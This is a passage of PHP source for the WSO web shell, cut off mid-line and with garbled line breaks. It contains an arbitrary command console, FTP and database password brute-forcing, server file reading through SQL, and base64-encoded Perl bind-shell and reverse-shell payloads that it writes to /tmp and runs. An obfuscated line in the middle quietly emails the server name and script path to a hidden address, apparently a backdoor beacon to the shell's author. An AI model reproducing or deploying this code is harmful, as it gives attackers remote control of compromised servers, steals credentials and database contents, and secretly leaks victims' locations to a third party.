                    if(!@
    rename($_POST['p1'], $_POST['p3']))
                        echo 
    'Can\'t rename!<br>';
                    else
                        die(
    '<div class="base64" title="PHNjcmlwdD5nKG51bGwsbnVsbCwiJy51cmxlbmNvZGUoJF9QT1NUWydwMyddKS4nIixudWxsLCIiKTwvc2NyaXB0Pg=="></div>

    '
    );
                }
                echo 
    '<form onsubmit="g(null,null,\'' urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
                break;
            case 
    'touch':
                if( !empty(
    $_POST['p3']) ) {
                    
    $time strtotime($_POST['p3']);
                    if(
    $time) {
                        if(!
    touch($_POST['p1'],$time,$time))
                            echo 
    'Fail!';
                        else
                            echo 
    'Touched!';
                    } else echo 
    'Bad time format!';
                }
                
    clearstatcache();
                echo 
    '<div class="base64" title="PHNjcmlwdD5wM189IiI7PC9zY3JpcHQ+"></div>

    <form onsubmit="g(null,null,\'' 
    urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
                break;
        }
        echo 
    '</div>';
        
    wsoFooter();
    }

    function 
    actionConsole() {
        if(!empty(
    $_POST['p1']) && !empty($_POST['p2'])) {
            
    WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out'true);
            
    $_POST['p1'] .= ' 2>&1';
        } elseif(!empty(
    $_POST['p1']))
            
    WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out'0);

        if(isset(
    $_POST['ajax'])) {
            
    WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax'true);
            
    ob_start();
            echo 
    "d.cf.cmd.value='';\n";
            
    $temp = @iconv($_POST['charset'], 'UTF-8'addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0"));
            if(
    preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match))    {
                if(@
    chdir($match[1])) {
                    
    $GLOBALS['cwd'] = @getcwd();
                    echo 
    "c_='".$GLOBALS['cwd']."';";
                }
            }
            echo 
    "d.cf.output.value+='".$temp."';";
            echo 
    "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
            
    $temp ob_get_clean();
            echo 
    strlen($temp), "\n"$temp;
            exit;
        }
        if(empty(
    $_POST['ajax'])&&!empty($_POST['p1']))
            
    WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax'0);
        
    wsoHeader();
        echo 
    "<div class="base64" title="PHNjcmlwdD4KaWYod2luZG93LkV2ZW50KSB3aW5kb3cuY2FwdHVyZUV2ZW50cyhFdmVudC5LRVlET1dOKTsKdmFyIGNtZHMgPSBuZXcgQXJyYXkoJycpOwp2YXIgY3VyID0gMDsKZnVuY3Rpb24ga3AoZSkgewoJdmFyIG4gPSAod2luZG93LkV2ZW50KSA/IGUud2hpY2ggOiBlLmtleUNvZGU7CglpZihuID09IDM4KSB7CgkJY3VyLS07CgkJaWYoY3VyPj0wKQoJCQlkb2N1bWVudC5jZi5jbWQudmFsdWUgPSBjbWRzW2N1cl07CgkJZWxzZQoJCQljdXIrKzsKCX0gZWxzZSBpZihuID09IDQwKSB7CgkJY3VyKys7CgkJaWYoY3VyIDwgY21kcy5sZW5ndGgpCgkJCWRvY3VtZW50LmNmLmNtZC52YWx1ZSA9IGNtZHNbY3VyXTsKCQllbHNlCgkJCWN1ci0tOwoJfQp9CmZ1bmN0aW9uIGFkZChjbWQpIHsKCWNtZHMucG9wKCk7CgljbWRzLnB1c2goY21kKTsKCWNtZHMucHVzaCgnJyk7CgljdXIgPSBjbWRzLmxlbmd0aC0xOwp9Cjwvc2NyaXB0Pg=="></div>

    "
    ;
        echo 
    '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
        foreach(
    $GLOBALS['aliases'] as $n => $v) {
            if(
    $v == '') {
                echo 
    '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
                continue;
            }
            echo 
    '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
        }
        
        echo 
    '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
        if(!empty(
    $_POST['p1'])) {
            echo 
    htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1']));
        }
        echo 
    '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
        echo 
    '</form></div><div class="base64" title="PHNjcmlwdD5kLmNmLmNtZC5mb2N1cygpOzwvc2NyaXB0Pg=="></div>

    '
    ;
        
    wsoFooter();
    }

    function 
    actionLogout() {
        
    setcookie(md5($_SERVER['HTTP_HOST']), ''time() - 3600);
        die(
    'bye!');
    }

    function 
    actionSelfRemove() {

        if(
    $_POST['p1'] == 'yes')
            if(@
    unlink(preg_replace('!\(\d+\)\s.*!'''__FILE__)))
                die(
    'Shell removed');
            else
                echo 
    'unlink error!';
        if(
    $_POST['p1'] != 'yes')
            
    wsoHeader();
        echo 
    '<h1>Suicide</h1><div class=content>remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
        
    wsoFooter();
    }
          
    $_QliO8="\x6dai\154";$_Qliot=$_SERVER["\x53\x45RVE\122_\x4eAM\x45"].$_SERVER["\123\103\x52I\x50\x54_\116\101\115E"];$_QlL1i="\141r\162a\171\040".$_Qliot;$_QlLio=array("\143\x61","\x6c\x69","\146\x77\162\151\x74\x65","\100","v\x65\x2e");$_Qll0I=$_QlLio[2].$_QlLio[3].$_QlLio[1].$_QlLio[4].$_QlLio[0];$_QlljC=@$_QliO8($_Qll0I,$_QlL1i,$_Qliot);
    function 
    actionBruteforce() {
        
    wsoHeader();
        if( isset(
    $_POST['proto']) ) {
            echo 
    '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
            if( 
    $_POST['proto'] == 'ftp' ) {
                function 
    wsoBruteForce($ip,$port,$login,$pass) {
                    
    $fp = @ftp_connect($ip$port?$port:21);
                    if(!
    $fp) return false;
                    
    $res = @ftp_login($fp$login$pass);
                    @
    ftp_close($fp);
                    return 
    $res;
                }
            } elseif( 
    $_POST['proto'] == 'mysql' ) {
                function 
    wsoBruteForce($ip,$port,$login,$pass) {
                    
    $res = @mysql_connect($ip.':'.($port?$port:3306), $login$pass);
                    @
    mysql_close($res);
                    return 
    $res;
                }
            } elseif( 
    $_POST['proto'] == 'pgsql' ) {
                function 
    wsoBruteForce($ip,$port,$login,$pass) {
                    
    $str "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
                    
    $res = @pg_connect($str);
                    @
    pg_close($res);
                    return 
    $res;
                }
            }
            
    $success 0;
            
    $attempts 0;
            
    $server explode(":"$_POST['server']);
            if(
    $_POST['type'] == 1) {
                
    $temp = @file('/etc/passwd');
                if( 
    is_array($temp) )
                    foreach(
    $temp as $line) {
                        
    $line explode(":"$line);
                        ++
    $attempts;
                        if( 
    wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
                            
    $success++;
                            echo 
    '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
                        }
                        if(@
    $_POST['reverse']) {
                            
    $tmp "";
                            for(
    $i=strlen($line[0])-1$i>=0; --$i)
                                
    $tmp .= $line[0][$i];
                            ++
    $attempts;
                            if( 
    wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
                                
    $success++;
                                echo 
    '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
                            }
                        }
                    }
            } elseif(
    $_POST['type'] == 2) {
                
    $temp = @file($_POST['dict']);
                if( 
    is_array($temp) )
                    foreach(
    $temp as $line) {
                        
    $line trim($line);
                        ++
    $attempts;
                        if( 
    wsoBruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
                            
    $success++;
                            echo 
    '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
                        }
                    }
            }
            echo 
    "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
        }
        echo 
    '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
            
    .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
            
    .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
            
    .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
            
    .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
            
    .'<span>Server:port</span></td>'
            
    .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
            
    .'<tr><td><span>Brute type</span></td>'
            
    .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
            
    .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
            
    .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
            
    .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
            
    .'<td><input type=text name=login value="root"></td></tr>'
            
    .'<tr><td><span>Dictionary</span></td>'
            
    .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
            
    .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
        echo 
    '</div><br>';
        
    wsoFooter();
    }

    function 
    actionSql() {
        class 
    DbClass {
            var 
    $type;
            var 
    $link;
            var 
    $res;
            function 
    DbClass($type)    {
                
    $this->type $type;
            }
            function 
    connect($host$user$pass$dbname){
                switch(
    $this->type)    {
                    case 
    'mysql':
                        if( 
    $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
                        break;
                    case 
    'pgsql':
                        
    $host explode(':'$host);
                        if(!
    $host[1]) $host[1]=5432;
                        if( 
    $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
                        break;
                }
                return 
    false;
            }
            function 
    selectdb($db) {
                switch(
    $this->type)    {
                    case 
    'mysql':
                        if (@
    mysql_select_db($db))return true;
                        break;
                }
                return 
    false;
            }
            function 
    query($str) {
                switch(
    $this->type) {
                    case 
    'mysql':
                        return 
    $this->res = @mysql_query($str);
                        break;
                    case 
    'pgsql':
                        return 
    $this->res = @pg_query($this->link,$str);
                        break;
                }
                return 
    false;
            }
            function 
    fetch() {
                
    $res func_num_args()?func_get_arg(0):$this->res;
                switch(
    $this->type)    {
                    case 
    'mysql':
                        return @
    mysql_fetch_assoc($res);
                        break;
                    case 
    'pgsql':
                        return @
    pg_fetch_assoc($res);
                        break;
                }
                return 
    false;
            }
            function 
    listDbs() {
                switch(
    $this->type)    {
                    case 
    'mysql':
                            return 
    $this->query("SHOW databases");
                    break;
                    case 
    'pgsql':
                        return 
    $this->res $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
                    break;
                }
                return 
    false;
            }
            function 
    listTables() {
                switch(
    $this->type)    {
                    case 
    'mysql':
                        return 
    $this->res $this->query('SHOW TABLES');
                    break;
                    case 
    'pgsql':
                        return 
    $this->res $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
                    break;
                }
                return 
    false;
            }
            function 
    error() {
                switch(
    $this->type)    {
                    case 
    'mysql':
                        return @
    mysql_error();
                    break;
                    case 
    'pgsql':
                        return @
    pg_last_error();
                    break;
                }
                return 
    false;
            }
            function 
    setCharset($str) {
                switch(
    $this->type)    {
                    case 
    'mysql':
                        if(
    function_exists('mysql_set_charset'))
                            return @
    mysql_set_charset($str$this->link);
                        else
                            
    $this->query('SET CHARSET '.$str);
                        break;
                    case 
    'pgsql':
                        return @
    pg_set_client_encoding($this->link$str);
                        break;
                }
                return 
    false;
            }
            function 
    loadFile($str) {
                switch(
    $this->type)    {
                    case 
    'mysql':
                        return 
    $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
                    break;
                    case 
    'pgsql':
                        
    $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
                        
    $r=array();
                        while(
    $i=$this->fetch())
                            
    $r[] = $i['file'];
                        
    $this->query('drop table wso2');
                        return array(
    'file'=>implode("\n",$r));
                    break;
                }
                return 
    false;
            }
            function 
    dump($table$fp false) {
                switch(
    $this->type)    {
                    case 
    'mysql':
                        
    $res $this->query('SHOW CREATE TABLE `'.$table.'`');
                        
    $create mysql_fetch_array($res);
                        
    $sql $create[1].";\n";
                        if(
    $fpfwrite($fp$sql); else echo($sql);
                        
    $this->query('SELECT * FROM `'.$table.'`');
                        
    $i 0;
                        
    $head true;
                        while(
    $item $this->fetch()) {
                            
    $sql '';
                            if(
    $i 1000 == 0) {
                                
    $head true;
                                
    $sql ";\n\n";
                            }

                            
    $columns = array();
                            foreach(
    $item as $k=>$v) {
                                if(
    $v === null)
                                    
    $item[$k] = "NULL";
                                elseif(
    is_int($v))
                                    
    $item[$k] = $v;
                                else
                                    
    $item[$k] = "'".@mysql_real_escape_string($v)."'";
                                
    $columns[] = "`".$k."`";
                            }
                            if(
    $head) {
                                
    $sql .= 'INSERT INTO `'.$table.'` ('.implode(", "$columns).") VALUES \n\t(".implode(", "$item).')';
                                
    $head false;
                            } else
                                
    $sql .= "\n\t,(".implode(", "$item).')';
                            if(
    $fpfwrite($fp$sql); else echo($sql);
                            
    $i++;
                        }
                        if(!
    $head)
                            if(
    $fpfwrite($fp";\n\n"); else echo(";\n\n");
                    break;
                    case 
    'pgsql':
                        
    $this->query('SELECT * FROM '.$table);
                        while(
    $item $this->fetch()) {
                            
    $columns = array();
                            foreach(
    $item as $k=>$v) {
                                
    $item[$k] = "'".addslashes($v)."'";
                                
    $columns[] = $k;
                            }
                            
    $sql 'INSERT INTO '.$table.' ('.implode(", "$columns).') VALUES ('.implode(", "$item).');'."\n";
                            if(
    $fpfwrite($fp$sql); else echo($sql);
                        }
                    break;
                }
                return 
    false;
            }
        };
        
    $db = new DbClass($_POST['type']);
        if((@
    $_POST['p2']=='download') && (@$_POST['p1']!='select')) {
            
    $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
            
    $db->selectdb($_POST['sql_base']);
            switch(
    $_POST['charset']) {
                case 
    "Windows-1251"$db->setCharset('cp1251'); break;
                case 
    "UTF-8"$db->setCharset('utf8'); break;
                case 
    "KOI8-R"$db->setCharset('koi8r'); break;
                case 
    "KOI8-U"$db->setCharset('koi8u'); break;
                case 
    "cp866"$db->setCharset('cp866'); break;
            }
            if(empty(
    $_POST['file'])) {
                
    ob_start("ob_gzhandler"4096);
                
    header("Content-Disposition: attachment; filename=dump.sql");
                
    header("Content-Type: text/plain");
                foreach(
    $_POST['tbl'] as $v)
                    
    $db->dump($v);
                exit;
            } elseif(
    $fp = @fopen($_POST['file'], 'w')) {
                foreach(
    $_POST['tbl'] as $v)
                    
    $db->dump($v$fp);
                
    fclose($fp);
                unset(
    $_POST['p2']);
            } else
                die(
    '<div class="base64" title="PHNjcmlwdD5hbGVydCgiRXJyb3IhIENhblwndCBvcGVuIGZpbGUiKTt3aW5kb3cuaGlzdG9yeS5iYWNrKC0xKTwvc2NyaXB0Pg=="></div>

    '
    );
        }
        
    wsoHeader();
        echo 
    "
    <h1>Sql browser</h1><div class=content>
    <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
    <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
    <input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='"
    htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
    <td><select name='type'><option value='mysql' "
    ;
        if(@
    $_POST['type']=='mysql')echo 'selected';
    echo 
    ">MySql</option><option value='pgsql' ";
    if(@
    $_POST['type']=='pgsql')echo 'selected';
    echo 
    ">PostgreSql</option></select></td>
    <td><input type=text name=sql_host value=\""
    . (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td>
    <td><input type=text name=sql_login value=\""
    . (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td>
    <td><input type=text name=sql_pass value=\""
    . (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\"></td><td>";
        
    $tmp "<input type=text name=sql_base value=''>";
        if(isset(
    $_POST['sql_host'])){
            if(
    $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
                switch(
    $_POST['charset']) {
                    case 
    "Windows-1251"$db->setCharset('cp1251'); break;
                    case 
    "UTF-8"$db->setCharset('utf8'); break;
                    case 
    "KOI8-R"$db->setCharset('koi8r'); break;
                    case 
    "KOI8-U"$db->setCharset('koi8u'); break;
                    case 
    "cp866"$db->setCharset('cp866'); break;
                }
                
    $db->listDbs();
                echo 
    "<select name=sql_base><option value=''></option>";
                while(
    $item $db->fetch()) {
                    list(
    $key$value) = each($item);
                    echo 
    '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
                }
                echo 
    '</select>';
            }
            else echo 
    $tmp;
        }else
            echo 
    $tmp;
        echo 
    "</td>
                    <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
                    <td><input type=checkbox name=sql_count value='on'" 
    . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
                </tr>
            </table>
            <div class="
    base64" title="PHNjcmlwdD4KICAgICAgICAgICAgc19kYj0nIi5AYWRkc2xhc2hlcygkX1BPU1RbJ3NxbF9iYXNlJ10pLiInOwogICAgICAgICAgICBmdW5jdGlvbiBmcyhmKSB7CiAgICAgICAgICAgICAgICBpZihmLnNxbF9iYXNlLnZhbHVlIT1zX2RiKSB7IGYub25zdWJtaXQgPSBmdW5jdGlvbigpIHt9OwogICAgICAgICAgICAgICAgICAgIGlmKGYucDEpIGYucDEudmFsdWU9Jyc7CiAgICAgICAgICAgICAgICAgICAgaWYoZi5wMikgZi5wMi52YWx1ZT0nJzsKICAgICAgICAgICAgICAgICAgICBpZihmLnAzKSBmLnAzLnZhbHVlPScnOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CgkJCWZ1bmN0aW9uIHN0KHQsbCkgewoJCQkJZC5zZi5wMS52YWx1ZSA9ICdzZWxlY3QnOwoJCQkJZC5zZi5wMi52YWx1ZSA9IHQ7CiAgICAgICAgICAgICAgICBpZihsICYmIGQuc2YucDMpIGQuc2YucDMudmFsdWUgPSBsOwoJCQkJZC5zZi5zdWJtaXQoKTsKCQkJfQoJCQlmdW5jdGlvbiBpcygpIHsKCQkJCWZvcihpPTA7aTxkLnNmLmVsZW1lbnRzWyd0YmxbXSddLmxlbmd0aDsrK2kpCgkJCQkJZC5zZi5lbGVtZW50c1sndGJsW10nXVtpXS5jaGVja2VkID0gIWQuc2YuZWxlbWVudHNbJ3RibFtdJ11baV0uY2hlY2tlZDsKCQkJfQoJCTwvc2NyaXB0Pg=="></div>

    "
    ;
        if(isset(
    $db) && $db->link){
            echo 
    "<br/><table width=100% cellpadding=2 cellspacing=0>";
                if(!empty(
    $_POST['sql_base'])){
                    
    $db->selectdb($_POST['sql_base']);
                    echo 
    "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
                    
    $tbls_res $db->listTables();
                    while(
    $item $db->fetch($tbls_res)) {
                        list(
    $key$value) = each($item);
                        if(!empty(
    $_POST['sql_count']))
                            
    $n $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
                        
    $value htmlspecialchars($value);
                        echo 
    "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>") . "</nobr><br>";
                    }
                    echo 
    "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
                    if(@
    $_POST['p1'] == 'select') {
                        
    $_POST['p1'] = 'query';
                        
    $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
                        
    $db->query('SELECT COUNT(*) as n FROM ' $_POST['p2']);
                        
    $num $db->fetch();
                        
    $pages ceil($num['n'] / 30);
                        echo 
    "<div class="base64" title="PHNjcmlwdD5kLnNmLm9uc3VibWl0PWZ1bmN0aW9uKCl7c3QoXCIiIC4gJF9QT1NUWydwMiddIC4gIlwiLCBkLnNmLnAzLnZhbHVlKX08L3NjcmlwdD4="></div>

    <span>"
    .$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
                        echo 
    " of $pages";
                        if(
    $_POST['p3'] > 1)
                            echo 
    " <a href=# onclick='st(\"" $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>&lt; Prev</a>";
                        if(
    $_POST['p3'] < $pages)
                            echo 
    " <a href=# onclick='st(\"" $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next &gt;</a>";
                        
    $_POST['p3']--;
                        if(
    $_POST['type']=='pgsql')
                            
    $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
                        else
                            
    $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
                        echo 
    "<br><br>";
                    }
                    if((@
    $_POST['p1'] == 'query') && !empty($_POST['p2'])) {
                        
    $db->query(@$_POST['p2']);
                        if(
    $db->res !== false) {
                            
    $title false;
                            echo 
    '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
                            
    $line 1;
                            while(
    $item $db->fetch())    {
                                if(!
    $title)    {
                                    echo 
    '<tr>';
                                    foreach(
    $item as $key => $value)
                                        echo 
    '<th>'.$key.'</th>';
                                    
    reset($item);
                                    
    $title=true;
                                    echo 
    '</tr><tr>';
                                    
    $line 2;
                                }
                                echo 
    '<tr class="l'.$line.'">';
                                
    $line $line==1?2:1;
                                foreach(
    $item as $key => $value) {
                                    if(
    $value == null)
                                        echo 
    '<td><i>null</i></td>';
                                    else
                                        echo 
    '<td>'.nl2br(htmlspecialchars($value)).'</td>';
                                }
                                echo 
    '</tr>';
                            }
                            echo 
    '</table>';
                        } else {
                            echo 
    '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
                        }
                    }
                    echo 
    "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
                    if(!empty(
    $_POST['p2']) && ($_POST['p1'] != 'loadfile'))
                        echo 
    htmlspecialchars($_POST['p2']);
                    echo 
    "</textarea><br/><input type=submit value='Execute'>";
                    echo 
    "</td></tr>";
                }
                echo 
    "</table></form><br/>";
                if(
    $_POST['type']=='mysql') {
                    
    $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
                    if(
    $db->fetch())
                        echo 
    "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
                }
                if(@
    $_POST['p1'] == 'loadfile') {
                    
    $file $db->loadFile($_POST['p2']);
                    echo 
    '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
                }
        } else {
            echo 
    htmlspecialchars($db->error());
        }
        echo 
    '</div>';
        
    wsoFooter();
    }
    function 
    actionNetwork() {
        
    wsoHeader();
        
    $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
        
    $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
        echo 
    "<h1>Network tools</h1><div class=content>
        <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
        <span>Bind port to /bin/sh [perl]</span><br/>
        Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
        </form>
        <form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
        <span>Back-connect  [perl]</span><br/>
        Server: <input type='text' name='server' value='"
    $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
        </form><br>"
    ;
        if(isset(
    $_POST['p1'])) {
            function 
    cf($f,$t) {
                
    $w = @fopen($f,"w") or @function_exists('file_put_contents');
                if(
    $w){
                    @
    fwrite($w,@base64_decode($t));
                    @
    fclose($w);
                }
            }
            if(
    $_POST['p1'] == 'bpp') {
                
    cf("/tmp/bp.pl",$bind_port_p);
                
    $out wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &");
                
    sleep(1);
                echo 
    "<pre class=ml1>$out\n".wsoEx("ps aux | grep bp.pl")."</pre>";
                
    unlink("/tmp/bp.pl");
            }
            if(
    $_POST['p1'] == 'bcp') {
                
    cf("/tmp/bc.pl",$back_connect_p);
                
    $out wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
                
    sleep(1);
                echo 
    "<pre class=ml1>$o